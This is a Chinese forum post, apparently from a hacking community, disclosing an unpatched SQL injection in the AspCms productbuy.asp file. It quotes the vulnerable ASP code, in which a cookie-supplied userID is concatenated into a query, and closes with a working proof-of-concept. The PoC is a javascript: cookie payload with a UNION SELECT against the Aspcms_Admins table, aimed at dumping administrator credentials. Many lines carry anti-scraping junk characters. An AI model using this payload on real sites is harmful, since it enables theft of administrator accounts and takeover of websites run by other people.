好久没上土司了,上来一看发现在删号名单内.....
: C' c8 B" T8 Q r' L( |! d也没啥好发的,前些天路过某个小站,用的AspCms这个系统,搜索了下,productbuy.asp这个文件存在注射,但是目标已经修补....下载了代码,很奇葩的是productbuy.asp这个文件官方虽然修补了网上提到的漏洞,但是就在同一个文件下面找到了注射漏洞。。。。。。。# t% j/ D! Z+ Q% A
废话不多说,看代码:
4 [, A3 P) x* P4 u- D9 a' M, n: @1 q _% D' P( S2 e! N. p& d
<%
3 O' _' T {" t+ {- X. F$ G4 j9 r- Y5 z( S# V5 c" @
if action = "buy" then; \3 w+ }9 d0 P* Z, D) g3 e2 K, x
: s, [# s6 D; B0 v$ l addOrder()) w# P" P; [6 K$ k. r
; {* ^' T; I" \& M2 j1 Felse
& i% r6 o4 B8 c' U8 f0 j& i
4 z- p) T+ L9 R, a3 T. N- O9 P9 P echoContent()# y9 E2 b& X& ~& Y7 }* k0 q! \
9 w; X+ V3 B: Z: R0 p+ o% v' T
end if
6 e! z) P) @. |; X0 Y- b
% A3 |' E, s! g' @# |7 h! P& r# x" T6 o/ d" _
4 F9 s5 N) T$ Z( b……略过
+ G. W }: J' Z& l+ e2 W/ r# L; o+ F* b. S0 Y5 _
: Z& b9 A6 }( d! _' g/ i' @" _2 ~! }1 z* R! h$ }5 B
Sub echoContent()- l" T! r3 i2 ?0 q; \9 r3 N9 o
: b" z" }2 b& h* r) m b dim id% F. e4 Y( T- \# w
. G. p P% m- Q
id=getForm("id","get")
4 W5 g! F/ M* f R
% L) U( u( a$ l0 G4 V% Y# A
$ c/ D2 R6 S, L+ U! T( L, J' p5 q, B7 ~. L) a+ P
if isnul(id) or not isnum(id) then alertMsgAndGo "请选择产品!","-1"
7 K, ?2 `4 C$ E3 `+ }! X1 V6 i* Q- U, C
y8 k e$ ^ B; i* o
+ q% q, V! ?& w/ s5 A' v
dim templateobj,channelTemplatePath : set templateobj = mainClassobj.createObject("MainClass.template")* B: e; ]9 r7 O
2 @. M% p) d+ v. Q
dim typeIds,rsObj,rsObjtid,Tid,rsObjSmalltype,rsObjBigtype,selectproduct3 K2 ]8 S4 F& b' h3 b5 S, j
+ x, {' k2 G- J# B# s3 D. } Dim templatePath,tempStr. U. `/ W! p; ]
! p% C5 P; G; J4 f, {* p templatePath = "/"&sitePath&"templates/"&defaultTemplate&"/"&htmlFilePath&"/productbuy.html") b( y% _9 w+ ?' T
8 d$ B, A! v7 A+ M m2 N- A- j' R
- W0 q/ i5 H8 c2 \* i; G! a
4 k! }$ I) a$ L6 q% X, X+ K9 z& ^9 e% {
set rsObj=conn.Exec("select title from aspcms_news where newsID="&id,"r1")4 q- ]1 D& H& g X E0 v
' u5 t+ F2 R5 D1 q, q. m" m
selectproduct=rsObj(0). |6 ]% K9 T/ O
7 z9 t" u0 u) y3 p# H2 S' ~
) G r5 Q, d- c* |* {6 X; z. [, c
) K. q1 J& u8 \" C
Dim linkman,gender,phone,mobile,email,qq,address,postcode
0 A! o1 y5 ?0 F& d
/ O. i N+ s: x& o: ?7 N/ x if isnul(rCookie("loginstatus")) then wCookie"loginstatus",0
' y' |" S7 v- i) |+ _0 b
7 V+ y/ j) v/ B) B* `; \ if rCookie("loginstatus")=1 then
+ x! A* F) L* T- d* x" e5 X5 _6 {, |4 E! d
set rsObj=conn.Exec("select * from aspcms_Users where UserID="&trim(rCookie("userID")),"r1")6 n9 E" ?; j1 k: a
& C8 |3 y: t. ~: D1 F/ N1 a1 k# Q7 m) I
linkman=rsObj("truename")" C% K' e1 I% x. L6 I! y/ B, f
3 f3 e7 k. g, j D. u8 D$ o& ]5 X gender=rsObj("gender")1 o& \$ Y6 V$ |1 w
) p9 c. ]( C. {5 _: r- `3 V
phone=rsObj("phone")$ \4 O: k9 r& n5 x; f0 K
) \: O0 S5 h# a8 Y$ u
mobile=rsObj("mobile")* f* G+ F% e% x8 [0 {" \
0 @) k, t2 Y, x0 ?# M+ O1 M, b. M
email=rsObj("email")
! ?* O1 D$ s5 D W( H% {; b% N+ {* I, Y) F/ N/ Y& J3 Z
qq=rsObj("qq")
" T* r/ u& F& J3 g0 m7 c2 [0 |, C6 w9 d% y6 m
address=rsObj("address")1 o2 ~4 N0 d: a. B
, h( Q' C9 c3 x4 }
postcode=rsObj("postcode")
, ~% X2 o) i' p2 V, _/ P3 ^4 ?" R# a" O
else ; a" b. ?" {( R" z% f$ O
# l# m& D5 ~5 j8 E# n gender=1/ y+ I( x3 x2 v, R9 H. I! Z
% K" j6 e8 d! w0 t0 b* O" o
end if0 r0 U7 X c4 w% h. h0 A3 @
2 j8 |3 Z2 p2 b/ A' S+ x rsObj.close()
! e# T6 k! T" |) X/ [4 P
0 Q+ D9 @7 R3 V9 G2 M5 r+ H# M9 d : G/ \9 F4 u/ ^0 j6 R. H
$ L$ ?+ f `1 L" O, w$ w5 I with templateObj 8 _1 C* t) u4 m" J8 _ c8 I
0 C' \' ^/ R$ u/ G .content=loadFile(templatePath) ' G/ ~" B% Q0 D) d1 L- X% u
) B4 v5 g$ ]- K/ {# F
.parseHtml()+ n) C0 `$ C& o2 a% r$ E1 `
0 g5 S8 X5 U' r/ D .content=replaceStr(.content,"{aspcms:selectproduct}",selectproduct)
( p$ ^1 }7 H+ C; Y3 h6 h* r" }5 X: P, l# e
.content=replaceStr(.content,"[aspcms:linkman]",linkman) 6 _% a0 v8 l3 a4 D
- e# {/ a3 L# I9 |: |' R .content=replaceStr(.content,"[aspcms:gender]",gender) 8 m: x) K3 x1 R
" c# D( F2 O3 Z# v' ^+ T7 R .content=replaceStr(.content,"[aspcms:phone]",phone)
: Z- V# t F, ]9 t' P
5 ^' x! d$ i5 y .content=replaceStr(.content,"[aspcms:mobile]",mobile)
, }) o# q& \: ~. E( h% V2 I3 D! I: m" l$ ^0 J! o. W
.content=replaceStr(.content,"[aspcms:email]",email) 1 g4 J3 V- K k/ F% y
2 t: a" o; L5 v$ w# b; g
.content=replaceStr(.content,"[aspcms:qq]",qq)
' K' h6 R" y- [) t1 I9 [
" W/ b: }( h% ~# V" P7 D .content=replaceStr(.content,"[aspcms:address]",address)
& o/ [, k/ [$ {. X
- _/ m, P- ]$ y: m" }4 r/ }; O .content=replaceStr(.content,"[aspcms:postcode]",postcode) ' O* l# ~3 [1 L! R* K! ]5 R( e4 A7 H
e# V& n: a5 ?# Y% g+ G .parseCommon() + S( C8 J$ H5 j2 @
* r& Z" b& Y C' k1 r' g echo .content : B4 i9 M" }! v. R) S: y
# Y; B! I1 l- L3 Y. I6 J- k end with
8 k4 R# g8 u0 Z/ [. ~8 r/ z0 N! j; }5 j8 O5 f
set templateobj =nothing : terminateAllObjects
1 K0 |& ?7 V6 g' b, O1 I7 E. O
/ H6 N, G7 [- e$ yEnd Sub+ Y* h) r1 ~- Z8 n, e+ Z; L: O. o
漏洞很明显,没啥好说的
2 Q. o9 G( }- a0 _poc:0 \$ v1 z* R+ u9 K# |! D
/ u& |; m6 w9 S2 e% q% `( x" c
javascript:alert(document.cookie="loginstatus=" + escape("1"));alert(document.cookie="userID=" + escape("1 union select 1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2 from [Aspcms_Admins]"));另外,脚本板块没权限发帖子
1 G; z o$ J( f) Z% t5 B: S6 K6 r( I
|